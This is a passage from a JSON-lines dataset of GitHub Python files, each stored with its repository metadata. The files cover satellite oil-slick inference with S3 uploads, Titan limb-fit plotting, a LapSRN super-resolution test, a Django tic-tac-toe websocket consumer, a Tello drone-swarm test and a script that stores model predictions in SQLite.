Inference_Ext(Inference):\n def __init__(\n self,\n grd,\n ocn=None,\n ml_pkls=ml_config.ML_PKL_LIST,\n thresholds=ml_config.ML_THRESHOLDS,\n fine_pkl_idx=-1,\n chip_size_orig=ml_config.CHIP_SIZE_ORIG,\n chip_size_reduced=ml_config.CHIP_SIZE_REDUCED,\n overhang=ml_config.OVERHANG,\n use_ocn=ml_config.USE_OCN,\n geom_path=None,\n ):\n # DB Columns\n self.grd = grd\n self.ocn = ocn\n self.ml_pkls = ml_pkls\n self.thresholds = thresholds\n self.fine_pkl_idx = fine_pkl_idx\n self.chip_size_orig = chip_size_orig\n self.chip_size_reduced = chip_size_reduced\n self.overhang = overhang\n\n # Calculated\n self.polys = [] # Shapely Objects\n self.posi_polys = [] # SQLAlchemy objects\n self.grd_path = grd.file_path\n self.prod_id = grd.pid\n self.geom_path = geom_path or self.grd_path.with_name(\n f\"slick_{'-'.join([str(t) for t in self.thresholds])}conf.geojson\"\n )\n self.use_ocn = use_ocn\n\n def save_small_to_s3(self, pct=0.25):\n small_path = self.grd_path.with_name(\"small.tiff\")\n resize(self.grd_path, small_path, pct)\n s3_raster_path = f\"s3://skytruth-cerulean/outputs/rasters/{self.prod_id}.tiff\"\n cmd = f\"aws s3 cp {small_path} {s3_raster_path}\"\n run(cmd, shell=True)\n clear(small_path)\n\n def save_poly_to_s3(self):\n s3_vector_path = (\n f\"s3://skytruth-cerulean/outputs/vectors/{self.prod_id}.geojson\"\n )\n cmd = f\"aws s3 cp {self.geom_path} {s3_vector_path}\"\n run(cmd, shell=True)\n\n\nclass Posi_Poly_Ext(Posi_Poly):\n def __init__(self, inf=None, geoshape=None, slick=None, from_obj=None):\n if from_obj:\n self.inference = from_obj.inference\n self.slick = from_obj.slick\n self.geometry = from_obj.geometry\n else:\n # DB Columns\n self.inference = inf\n self.slick = slick\n self.geometry = shape_to_ewkt(geoshape)\n\n def calc_eezs(self, sess):\n # XXX This set command isn't working.\n eez_ids = set([e.id for e in self.get_intersecting_objects(sess, Eez)])\n return [Eez_Ext.from_id(e_id, sess) for e_id in eez_ids]\n\n\nclass Vessel_Ext(Vessel):\n def __init__(self, inf, geoshape):\n # DB Columns\n self.inference = inf\n self.geometry = shape_to_ewkt(geoshape)\n\n\nclass Coincident_Ext(Coincident):\n def __init__(self, posi_poly, vessel, input=\"???\"):\n # DB Columns\n self.posi_poly = posi_poly\n self.vessel = vessel\n\n # Placeholders\n self.direct_hits = None\n self.proximity = None\n self.score = None\n self.method = None\n self.destination = None\n self.speed_avg = None\n self.status = None\n self.port_last = None\n self.port_next = None\n self.cargo_type = None\n self.cargo_amount = None\n\n def to_api_dict(self):\n res = {\n \"id\": self.vessel.id,\n \"mmsi\": self.vessel.mmsi,\n \"name\": self.vessel.name,\n \"flag\": self.vessel.flag,\n \"callsign\": self.vessel.callsign,\n \"imo\": self.vessel.imo,\n \"shiptype\": self.vessel.shiptype,\n \"length\": self.vessel.length,\n \"direct_hits\": self.direct_hits,\n \"proximity\": self.proximity,\n \"score\": self.score, # ORDER LIST BY THIS VALUE\n \"method\": self.method,\n \"destination\": self.destination,\n \"speed_avg\": self.speed_avg,\n }\n return res\n\n\nclass Slick_Ext(Slick):\n def __init__(self, posi_polys=[], from_obj=None):\n if from_obj:\n self.posi_polys = [\n Posi_Poly_Ext(from_obj=posi_poly) for posi_poly in from_obj.posi_polys\n ]\n else:\n # DB Columns\n self.posi_polys = posi_polys\n\n # Calculated\n self.timestamp = self.calc_timestamp()\n self.geometry = shape_to_ewkt(self.calc_geometry())\n self.coincidents = self.calc_coincidents()\n\n def to_api_dict(\n self, sess\n ): # XXXHELP Should the session just be a global variable?\n res = {\n \"id\": self.id,\n \"timestamp\": to_standard_datetime_str(self.timestamp),\n \"geometry\": self.geometry,\n \"eezs\": [eez.to_api_dict() for eez in self.calc_eezs(sess)],\n \"coincidents\": [\n coincident.to_api_dict() for coincident in self.coincidents\n ],\n }\n return res\n\n def calc_timestamp(self):\n return self.posi_polys[0].inference.grd.starttime\n\n def calc_geometry(self):\n return sh.MultiPolygon(\n [wk_to_shapely(poly.geometry) for poly in self.posi_polys]\n )\n\n def calc_eezs(self, sess):\n eez_ids = []\n for poly in self.posi_polys:\n eez_ids += [e.id for e in poly.calc_eezs(sess)]\n return [Eez_Ext.from_id(e_id, sess) for e_id in set(eez_ids)]\n\n def calc_coincidents(self):\n coincidents = []\n for poly in self.posi_polys:\n coincidents += poly.coincidents\n return coincidents\n\n\nclass Eez_Ext(Eez):\n def to_api_dict(self):\n res = {\n \"id\": self.id,\n \"mrgid\": self.mrgid,\n \"geoname\": self.geoname,\n \"pol_type\": self.pol_type,\n \"sovereigns\": self.sovereigns,\n }\n return res\n\n\nclass SHO:\n \"\"\"A class that organizes information about content stored on SciHub\n \"\"\"\n\n def __init__(self, grd, sess, user=server_config.SH_USER, pwd=server_config.SH_PWD):\n self.prod_id = grd.pid\n self.generic_id = self.prod_id[:7] + \"????_?\" + self.prod_id[13:-4] + \"*\"\n self.URLs = {\n \"query_prods\": f\"https://{user}:{pwd}@scihub.copernicus.eu/apihub/search?q=(platformname:Sentinel-1 AND filename:{self.generic_id})\",\n }\n\n # Placeholders\n self.grd_xml = self.grd_id = self.grd_shid = self.grd_path = None\n self.ocn = self.ocn_xml = None\n\n with requests.Session() as s:\n try:\n p = s.post(self.URLs[\"query_prods\"])\n except requests.exceptions.ConnectionError as e:\n print(\"Error connecting to SciHub\")\n raise e\n self.query_prods_res = xmltodict.parse(p.text)\n\n if self.query_prods_res.get(\"feed\").get(\"opensearch:totalResults\") != \"0\":\n prods = self.query_prods_res.get(\"feed\").get(\"entry\")\n if isinstance(prods, dict):\n prods = [\n prods\n ] # If there's only one product, xmlparser returns a dict instead of a list of dicts\n for p in prods:\n self.grd_xml = (\n p if \"GRD\" in p.get(\"title\") else self.grd_xml\n ) # This is XML\n self.ocn_xml = (\n p if \"OCN\" in p.get(\"title\") else self.ocn_xml\n ) # This is XML\n\n if self.grd_xml:\n self.grd_id = self.grd_xml.get(\"title\")\n self.grd_shid = self.grd_xml.get(\"id\")\n self.is_vv = \"VV\" in xml_get(\n self.grd_xml.get(\"str\"), \"polarisationmode\"\n )\n\n if self.ocn_xml:\n self.ocn = Ocn_Ext(grd, self.ocn_xml)\n self.URLs[\n \"download_ocn\"\n ] = f\"https://{user}:{pwd}@scihub.copernicus.eu/dhus/odata/v1/Products('{self.ocn.uuid}')/%24value\"\n\n else:\n pass # There are no products listed! https://app.asana.com/0/1170930608885369/1171069537674895\n\n def __repr__(self):\n return f\"\"\n\n def download_ocn(self, ocn_path=None):\n \"\"\"Create a local directory, and download an OCN zip file to it\n \"\"\"\n if server_config.VERBOSE:\n print(\"Downloading OCN\")\n if not self.ocn_xml:\n raise MissingProductError(\n product_id=self.prod_id, message=\"ERROR: No OCN found for this GRD\"\n )\n\n self.ocn.file_path = (\n ocn_path or Path(path_config.LOCAL_DIR) / \"temp\" / self.ocn.pid / \"ocn.zip\"\n )\n self.ocn.file_path.parent.mkdir(parents=True, exist_ok=True)\n if not self.ocn.file_path.exists():\n with requests.Session() as s:\n try:\n p = s.get(self.URLs.get(\"download_ocn\"))\n except requests.exceptions.ConnectionError as e:\n print(\"Error connecting to SciHub\")\n raise e\n open(self.ocn.file_path, \"wb\").write(p.content)\n return self.ocn.file_path\n\n def cleanup(self, grd=True, ocn=True):\n \"\"\"Delete any local directory made to store the GRD and OCN\n \"\"\"\n if self.grd_path.parent.exists() and grd:\n shutil.rmtree(self.grd_path.parent)\n if self.ocn.file_path.parent.exists() and ocn:\n shutil.rmtree(self.ocn.file_path.parent)\n\n","repo_name":"jonaraphael/ceruleanserver","sub_path":"ceruleanserver/data_objects.py","file_name":"data_objects.py","file_ext":"py","file_size_in_byte":12089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30925586824","text":"from data_processing.fitting import fit_data\nfrom settings.get_settings import join_strings, check_if_exists_or_write, SETTINGS\nimport re\nimport os\nimport numpy as np\nimport datetime\nfrom scipy.optimize import curve_fit\n# area for good figures and random figures\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport pyvims\n\nclass plotting_base:\n def __init__(self, devEnvironment: bool = True):\n if devEnvironment == True:\n self.save_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_figures_path\"], SETTINGS[\"paths\"][\"dev_figures_sub_path\"])\n else:\n self.save_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_figures_path\"], SETTINGS[\"paths\"][\"prod_figures_sub_path\"])\n self.filtered_data_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"sorted_sub_path\"])\n self.fitted_data_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"fitted_sub_path\"])\n self.devEnvironment = devEnvironment\n\n def get_fitted_data(self):\n all_data = {}\n if os.path.exists(join_strings(self.filtered_data_dir, SETTINGS[\"paths\"][\"cumulative_fitted_path\"])):\n all_data = check_if_exists_or_write(join_strings(\n self.fitted_data_dir, SETTINGS[\"paths\"][\"cumulative_fitted_path\"]), save=False, verbose=True)\n else:\n cubs = os.listdir(self.fitted_data_dir)\n cubs = [cub for cub in cubs if re.fullmatch(\n r'C.*_.*\\.pkl', cub) is not None]\n for cub in cubs:\n cube_name = os.path.splitext(cub)[0]\n all_data[cube_name] = check_if_exists_or_write(\n join_strings(self.fitted_data_dir, cub), save=False, verbose=True)\n return all_data\n\n def get_fig_path(self, figure_type: str, fig_name: str, cube_name: str):\n base_path = join_strings(self.save_dir, figure_type)\n figure_type = figure_type\n fig_name = fig_name\n cube_name = cube_name\n now = datetime.datetime.now()\n year = now.year\n month = now.month\n day = now.day\n hour = now.hour\n minute = now.minute\n second = now.second\n try:\n index = 1 + len(os.listdir(base_path))\n except:\n index = 1\n if self.devEnvironment == True:\n file_format = SETTINGS[\"paths\"][\"figure_path_format_dev\"]\n else:\n file_format = SETTINGS[\"paths\"][\"figure_path_format_dev\"]\n\n # Extract variable names from the file_format string\n placeholders = re.findall(r\"{(.*?)}\", file_format)\n # Create a dictionary to hold variable names and their values\n a = locals()\n file_formatted = '_'.join([str(a[placeholder]) for placeholder in placeholders])\n return join_strings(base_path, file_formatted)\n\n def filter_cubes(self, data, cubes : str):\n if cubes == \"all\":\n return data\n else:\n filtered_data = {}\n for cube in cubes:\n filtered_data[cube] = data[cube]\n return filtered_data\n \n def timeline_figure(self, band: int = None):\n all_fits = {}\n fig, axs = plt.subplots(4, 3, figsize=(12, 8))\n axs = axs.flatten()\n plt.title(str(band))\n data = self.get_fitted_data()\n quantity = len(data)\n cmap = matplotlib.colormaps.get_cmap('bone')\n for index, (cube, cube_fits) in enumerate(data.items()):\n key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n wavelength_fit = cube_fits[key]\n length = len(wavelength_fit)\n for ind, (degree, slant) in enumerate(wavelength_fit.items()):\n axs[index].plot(slant[\"emission_angles\"], slant[\"brightness_values\"], label = str(degree), color= cmap(1.6*abs(ind/length - 0.5)))\n axs[index].set_xlim(0, 95)\n axs[index].set_ylim(bottom = 0)\n axs[index].legend(fontsize=3)\n axs[index].set_title(cube)\n fig.tight_layout()\n try:\n check_if_exists_or_write(self.get_fig_path(\"timeline\", str(band), \"all\") + \".png\", save=True, data=\"sdfs\", force_write=True, verbose=True)\n except:\n pass\n fig.savefig(self.get_fig_path(\"timeline\", str(band), \"all\") + \".png\", dpi=450)\n # plt.show()\n\n def look_at_fits(self, cube_index: int = None, band: int = None):\n data = self.get_fitted_data()\n data = dict(sorted(data.items()))\n cube = data[list(data.keys())[cube_index]]\n band = cube[list(cube.keys())[band]]\n fit_obj = fit_data(fit_type=\"quad\")\n for slant, slant_data in band.items():\n \n x = fit_obj.emission_to_normalized(np.linspace(np.min(slant_data[\"emission_angles\"]), np.max(slant_data[\"emission_angles\"]), 100))\n # fit_obj.I_0 = slant_data[\"fit\"][\"fit_params\"][\"I_0\"]\n \n y = [fit_obj.quadratic_limb_darkening(xs,slant_data[\"fit\"][\"fit_params\"][\"I_0\"], slant_data[\"fit\"][\"fit_params\"][\"u1\"], slant_data[\"fit\"][\"fit_params\"][\"u2\"]) for xs in x]\n plt.plot(x, y)\n plt.plot(fit_obj.emission_to_normalized(slant_data[\"emission_angles\"]), slant_data[\"brightness_values\"])\n plt.show()\n # for index, (cube, cube_fits) in enumerate(cube.items()):\n # key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n # wavelength_fit = cube_fits[key]\n # length = len(wavelength_fit)\n # for ind, (degree, slant) in enumerate(wavelength_fit.items()):\n # plt.plot(slant[\"emission_angles\"], slant[\"brightness_values\"], label = str(degree))\n # plt.set_xlim(0, 95)\n # plt.set_ylim(bottom = 0)\n plt.legend(fontsize=6)\n # plt.title(\"\")\n def coeff_vs_deg(self, band: int = None):\n data = self.get_fitted_data()\n data = dict(sorted(data.items()))\n fig, axs = plt.subplots(4, 3, figsize=(12, 8))\n axs = axs.flatten()\n \n handles = [] # To store legend handles\n for index, (cube, cube_fits) in enumerate(data.items()):\n key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n wavelength_fit = cube_fits[key]\n u_plus = []\n u_minus = []\n axs[index].set_title(cube)\n axs[index].minorticks_on()\n axs[index].set_xticks(np.arange(0,361, 60))\n axs[index].set_yticks(np.arange(-2,3.1, 1, dtype=int))\n # axs[index].set_ylabel(\"N/\")\n axs[index].set_xlim(-20,380)\n axs[index].set_ylim(-1.5,3)\n for slant, slant_data in wavelength_fit.items():\n u1 = axs[index].scatter(slant, slant_data[\"fit\"][\"fit_params\"][\"u1\"], color=(0, 0, 0))\n u2 = axs[index].scatter(slant, slant_data[\"fit\"][\"fit_params\"][\"u2\"], color=(1, 0, 0))\n\n u_plus.append(slant_data[\"fit\"][\"fit_params\"][\"u1\"] + slant_data[\"fit\"][\"fit_params\"][\"u2\"])\n u_minus.append(slant_data[\"fit\"][\"fit_params\"][\"u1\"] - slant_data[\"fit\"][\"fit_params\"][\"u2\"])\n\n line_plus, = axs[index].plot(list(wavelength_fit.keys()), u_plus, color=(0, 1, 0))\n line_minus, = axs[index].plot(list(wavelength_fit.keys()), u_minus, color=(0, 0, 1))\n if index == 0:\n handles.append(u1) # Add scatter plot handle to the list \n handles.append(u2)\n handles.append(line_plus) # Add line plot handle to the list\n handles.append(line_minus) # Add line plot handle to the list\n elif index >= 9:\n axs[index].set_xlabel(\"Slant Angle (˚)\")\n # Don't add labels to individual lines, we'll add them to the global legend\n # axs[index].legend([line_plus, line_minus], )\n\n # Create a global legend outside the loop\n fig.legend(handles, [\"µ1\", \"µ2\",\"µ1 + µ2\", \"µ1 - µ2\"])\n fig.subplots_adjust(wspace=0.12, hspace=0.3, top=0.95, bottom=0.05, left=0.05, right=0.95)\n # Customize the markers in the legend\n # for legend_item in global_legend.legendHandles:\n # legend_item.set_markerfacecolor('black') # Set the marker face color\n # legend_item.set_markeredgecolor('black') # Set the marker edge color\n # legend_item.set_markersize(10) # Set the marker size\n \n plt.show()\n\n # for index, (cube, cube_fits) in enumerate(cube.items()):\n # key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n # wavelength_fit = cube_fits[key]\n # length = len(wavelength_fit)\n # for ind, (degree, slant) in enumerate(wavelength_fit.items()):\n # plt.plot(slant[\"emission_angles\"], slant[\"brightness_values\"], label = str(degree))\n # plt.set_xlim(0, 95)\n # plt.set_ylim(bottom = 0)\n # plt.legend(fontsize=6)\n def select_good_and_bad_bands(self):\n fitted_data = self.get_fitted_data()\n cubes = {}\n rejected =[0]\n if os.path.exists(os.curdir + \"/rejected_bands.pkl\"):\n rejected = check_if_exists_or_write(os.curdir + \"/rejected_bands.pkl\", save=False, verbose=True)\n \n for cube in fitted_data.keys():\n cube_vis = pyvims.VIMS(cube + \"_vis.cub\", join_strings(SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"cube_sub_path\"],cube), channel=\"vis\")\n cube_ir = pyvims.VIMS(cube + \"_ir.cub\", join_strings(SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"cube_sub_path\"],cube), channel=\"ir\")\n cubes[cube] = {\"vis\": cube_vis, \"ir\": cube_ir}\n for band in range(1,353):\n if band < np.max(rejected):\n continue\n import matplotlib.pyplot as plt\n fig, axs = plt.subplots(4,3, figsize=(14,8))\n axs = axs.flatten()\n for index, (cube, data) in enumerate(cubes.items()):\n axs[index].set_title(cube)\n if band <= 96:\n axs[index].imshow(data[\"vis\"][band], cmap=\"gray\")\n else:\n axs[index].imshow(data[\"ir\"][band], cmap=\"gray\")\n plt.waitforbuttonpress(5)\n plt.close(\"all\")\n while True:\n inp = input(str(band) + \" Good? (y/n)\")\n if \"y\" in inp:\n break\n if \"n\" in inp:\n rejected.append(band)\n break\n \n check_if_exists_or_write(os.curdir + \"/rejected_bands.pkl\", save=True, data=rejected, force_write=True, verbose=True)\n return rejected\n\nx = plotting_base()\n# var = x.select_good_and_bad_bands()\n# print(var)\nfor i in range(12):\n x.look_at_fits(cube_index=i,band=118)\n\n\n#index 1, North is straight right\n# figure_waves = np.linspace(1, 352, 4)\n# for wave in figure_waves:\n# print(wave)\n# x.timeline_figure(band=int(wave))\n# # print(x.get_fig_path(\"test\", \"test\", \"test\"))\n\n\n","repo_name":"AadvikVashist/Titan_Limb_Fitting","sub_path":"fitting_code/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":11136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73102424862","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 7 10:07:14 2017\n\n@author: ldy\n\"\"\"\n\nfrom __future__ import print_function\nfrom os.path import exists, join, basename\nfrom os import makedirs, remove\nimport argparse\nimport torch\nfrom torch.autograd import Variable\nfrom PIL import Image\nfrom torchvision.transforms import ToTensor\nfrom glob import glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 40, 24\nrcParams.update({'font.size': 22})\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch LapSRN')\nparser.add_argument('--test_folder', type=str, default='./dataset/BSDS300/images/train', help='input image to use')\nparser.add_argument('--model', type=str, default='model/model_epoch_50.pth', help='model file to use')\nparser.add_argument('--save_folfer', type=str, default='./results', help='input image to use')\nparser.add_argument('--output_filename', type=str, help='where to save the output image')\nparser.add_argument('--cuda', action='store_true', help='use cuda')\n\nopt = parser.parse_args()\n\nprint(opt)\n\ndef centeredCrop(img):\n width, height = img.size # Get dimensions\n new_width = width - width % 8\n new_height = height - height % 8 \n left = (width - new_width)/2\n top = (height - new_height)/2\n right = (width + new_width)/2\n bottom = (height + new_height)/2\n return img.crop((left, top, right, bottom))\n\ndef process(out, cb, cr):\n out_img_y = out.data[0].numpy()\n out_img_y *= 255.0\n out_img_y = out_img_y.clip(0, 255)\n out_img_y = Image.fromarray(np.uint8(out_img_y[0]), mode='L')\n \n out_img_cb = cb.resize(out_img_y.size, Image.BICUBIC)\n out_img_cr = cr.resize(out_img_y.size, Image.BICUBIC)\n out_img = Image.merge('YCbCr', [out_img_y, out_img_cb, out_img_cr]).convert('RGB')\n return out_img\n\ndef save_image(HR_2, HR_4, HR_8, GT, name):\n LR = GT.resize((y.size[0]/8, y.size[1]/8), Image.BICUBIC)\n Bicubic_HR_2 = LR.resize((y.size[0]*2, y.size[1]*2), Image.BICUBIC)\n Bicubic_HR_4 = LR.resize((y.size[0]*4, y.size[1]*4), Image.BICUBIC)\n Bicubic_HR_8 = LR.resize((y.size[0]*8, y.size[1]*8), Image.BICUBIC)\n\n fig = plt.figure()\n \n ax = plt.subplot(\"251\")\n ax.axis(\"off\")\n ax.imshow(LR)\n ax.set_title(\"LR\")\n \n ax = plt.subplot(\"252\")\n ax.axis(\"off\")\n ax.imshow(HR_2)\n ax.set_title(\"LapSAN HR_2\")\n \n ax = plt.subplot(\"253\")\n ax.axis(\"off\")\n ax.imshow(HR_4)\n ax.set_title(\"LapSAN HR_4\")\n \n ax = plt.subplot(\"254\")\n ax.axis(\"off\")\n ax.imshow(HR_8)\n ax.set_title(\"LapSAN HR_8\")\n \n ax = plt.subplot(\"255\")\n ax.axis(\"off\")\n ax.imshow(GT)\n ax.set_title(\"GT\")\n\n ax = plt.subplot(\"256\")\n ax.axis(\"off\")\n ax.imshow(LR)\n ax.set_title(\"LR\")\n \n ax = plt.subplot(\"257\")\n ax.axis(\"off\")\n ax.imshow(Bicubic_HR_2)\n ax.set_title(\"Bicubic HR_2\")\n \n ax = plt.subplot(\"258\")\n ax.axis(\"off\")\n ax.imshow(Bicubic_HR_4)\n ax.set_title(\"Bicubic HR_4\")\n \n ax = plt.subplot(\"259\")\n ax.axis(\"off\")\n ax.imshow(Bicubic_HR_8)\n ax.set_title(\"Bicubic HR_8\")\n \n ax = plt.subplot(2,5,10)\n ax.axis(\"off\")\n ax.imshow(GT)\n ax.set_title(\"GT\")\n if not exists(opt.save_folfer):\n makedirs(opt.save_folfer)\n fig.savefig(opt.save_folfer+'/'+name+'.png')\n print ('image:'+name+'saved!')\n \n\n \nimages_list = glob(opt.test_folder+'/*.jpg')\nprint (len(images_list))\nmodel = torch.load(opt.model)\nif opt.cuda:\n model = model.cuda()\nfor image_path in images_list:\n img_name = image_path.split('/')[-1].split('.')[0]\n img = Image.open(image_path).convert('YCbCr')\n img = centeredCrop(img)\n y, cb, cr = img.split()\n LR = y.resize((y.size[0]/8, y.size[1]/8), Image.BICUBIC)\n print (LR.size)\n LR = Variable(ToTensor()(LR)).view(1, -1, LR.size[1], LR.size[0])\n if opt.cuda:\n LR = LR.cuda()\n HR_2, HR_4, HR_8 = model(LR)\n HR_2 = HR_2.cpu()\n HR_4 = HR_4.cpu()\n HR_8 = HR_8.cpu()\n HR_2 = process(HR_2, cb, cr)\n HR_4 = process(HR_4, cb, cr)\n HR_8 = process(HR_8, cb, cr)\n img = img.convert(\"RGB\")\n save_image(HR_2, HR_4, HR_8, img, img_name)\n \n\n","repo_name":"BUPTLdy/Pytorch-LapSRN","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"7"} +{"seq_id":"43038920443","text":"from asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nfrom channels_presence.models import Room, Presence\n\nfrom django.db.models import Q\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom accounts.models import CustomUser, Notification\nfrom game.models import Match\nfrom chat.serializers import messageSenderSerializer\nimport json\nimport string \nimport random\nimport logging\n\ndb_logger = logging.getLogger('db')\n\nclass GameConsumer(WebsocketConsumer):\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room']\n self.room_group_name = 'game_' + self.room_name\n self.accept()\n\n if self.room_name == 'create':\n all = string.digits + string.ascii_letters\n name = random.choices(all, k=6)\n self.room_name = \"\".join(name)\n self.room_group_name = 'game_' + self.room_name\n self.send(json.dumps({\n 'type':'created',\n 'room':self.room_name,\n }))\n\n connected_count = 0\n elif self.room_name == 'random':\n counter = 1\n while self.room_name == 'random':\n try:\n room:Room = Room.objects.get(channel_name=f'random_{counter}')\n except ObjectDoesNotExist as e:\n room = Room.objects.create(channel_name=f'random_{counter}')\n connected_count = room.presence_set.count()\n if connected_count < 2:\n self.room_name = f'random_{counter}'\n self.room_group_name = f'random_{counter}'\n if connected_count == 0:\n self.send(json.dumps({\n 'type':'created',\n 'room':self.room_name,\n }))\n counter += 1\n \n elif self.room_name == 'invite':\n try:\n invited = self.scope['url_route']['kwargs']['invited']\n invited = CustomUser.objects.get(front_id=invited)\n except Exception as e:\n print(e)\n self.send(json.dumps({\n 'type':'error',\n 'code':'404',\n 'error':'Can\\'t find the user'\n }))\n self.close()\n else:\n all = string.digits + string.ascii_letters\n name = random.choices(all, k=16)\n self.room_name = \"\".join(name)\n self.room_group_name = 'game_' + self.room_name\n Notification.objects.create(user=invited, room=self.room_name)\n self.send(json.dumps({\n 'type':'invited',\n 'friend':invited.name,\n }))\n \n\n connected_count = 0\n else:\n try:\n connected_count = Room.objects.get(channel_name=self.room_group_name).presence_set.count()\n except:\n self.send(json.dumps({\n 'type':'error',\n 'code':'404',\n 'error': 'this room doesn\\'t exist please make sure you typed the code right'\n }))\n self.close()\n return\n else:\n if connected_count > 1:\n self.send(text_data=json.dumps({\n 'type':'error',\n 'code':'420',\n 'error': 'this room is already full try to connect to different room'\n }))\n self.close()\n return\n \n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n Room.objects.add(self.room_group_name, self.channel_name, self.scope['user'])\n\n if connected_count == 1:\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type':'room_completed',\n }\n )\n \n\n \n def disconnect(self, close_code):\n # Leave room group\n try:\n player = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(channel_name=self.channel_name)\n if player.exists():\n user = player.first().user \n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type':'error',\n 'code':'430',\n 'error':'user left the room. waiting for another user to join'\n }\n )\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n Room.objects.remove(self.room_group_name, self.channel_name)\n except Exception as e:\n print('error occured')\n print(e)\n Room.objects.prune_presences()\n Room.objects.prune_rooms()\n \n \n def receive(self, text_data):\n player = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(channel_name=self.channel_name)\n if not player.exists():\n self.send(json.dumps({\n 'type':'error',\n 'code':'408',\n 'error':'Time out! You have to play in 15 seconds'\n }))\n self.close()\n return\n\n text_data = json.loads(text_data)\n if text_data['type'] == 'completed':\n \n user:CustomUser = self.scope['user']\n match = Match()\n if user.is_authenticated:\n user = CustomUser.objects.get(id=user.id)\n user.lost_games += 1\n match.loser = user\n user.save()\n\n competitor:CustomUser = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(~Q(channel_name=self.channel_name)).first().user\n if competitor:\n competitor.won_games += 1\n match.winner = competitor\n competitor.save()\n if match.loser or match.winner:\n match.save()\n return \n elif text_data['type'] == 'draw':\n competitor:CustomUser = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(~Q(channel_name=self.channel_name)).first().user\n match = Match.objects.create()\n \n if competitor:\n competitor.draw_games += 1\n competitor.matches.add(match)\n competitor.save()\n user = self.scope['user']\n if user.is_authenticated:\n user = CustomUser.objects.get(id=user.id)\n user.draw_games += 1\n user.matches.add(match)\n user.save() \n if not match.draw.all():\n match.delete()\n return\n\n\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n text_data\n )\n Presence.objects.touch(self.channel_name)\n\n \n def game_play(self, event):\n self.send(text_data=json.dumps(event))\n \n\n def error(self, event):\n self.send(json.dumps(event))\n\n def room_completed(self, event):\n user = self.scope['user']\n self_channel = Presence.objects.get(channel_name=self.channel_name)\n\n competitor = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(~Q(channel_name=self_channel)).first().user\n if user.is_authenticated:\n serializer = messageSenderSerializer(instance=user)\n event.update({\n 'self': serializer.data\n })\n else:\n try:\n event.update({\n 'self': {\n 'front_id':None,\n 'image':CustomUser().image.url,\n 'name':'Unknown User',\n 'profile_url':\"#\"\n }\n })\n except Exception as e:\n print('cannot complete room')\n print(e)\n\n if competitor:\n serializer = messageSenderSerializer(instance=competitor)\n event.update({\n 'competitor': serializer.data\n })\n else:\n try:\n event.update({\n 'competitor': {\n 'front_id':None,\n 'image':CustomUser().image.url,\n 'name':'Unknown User',\n 'profile_url':\"#\"\n }\n })\n except Exception as e:\n print('cannot complete room')\n print(e)\n\n self.send(json.dumps(event))\n \n def restart(self, event):\n self.send(json.dumps(event))\n\n","repo_name":"ahmedyasserays/XO-online","sub_path":"game/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1970738812","text":"from djitellopy import TelloSwarm\n\nswarm = TelloSwarm.fromIps([\n \"192.168.137.225\",\n \"192.168.137.5\"\n])\n\nswarm.connect()\n# swarm.takeoff()\nfor tello in swarm:\n print(tello.get_battery())\n\nswarm.move_up(100)\n\nswarm.sequential(lambda i, tello: tello.move_forward(20))\n\nswarm.parallel(lambda i, tello: tello.move_left(100))\n\nswarm.land()\nswarm.end()\n","repo_name":"despire907/TelloDroneStage","sub_path":"test/SwarmTest.py","file_name":"SwarmTest.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38574865534","text":"import pickle\nimport pandas as pd\nimport sqlite3\nfrom sklearn.preprocessing import StandardScaler\n\n\n# Load the trained model\nwith open('best_nn_model.pkl', 'rb') as f:\n model = pickle.load(f)\n\n# Load the samples to classify\nsamples = pd.read_csv('data/df_test.csv')\n\n\n# Scale the input variables\nscaler = StandardScaler()\nsamples_scaled = scaler.fit_transform(samples)\n\n# Make predictions\npredictions = model.predict(samples_scaled)\n\n# Store the results in a SQLite database table\nconn = sqlite3.connect('data/predictions_test.db')\nc = conn.cursor()\n\n# Create the table if it doesn't exist\nc.execute('''CREATE TABLE IF NOT EXISTS predictions (id INTEGER PRIMARY KEY, class TEXT)''')\n\n# Insert the predictions into the table\nfor i, pred in enumerate(predictions):\n c.execute(\"INSERT INTO predictions (id, class) VALUES (?, ?)\", 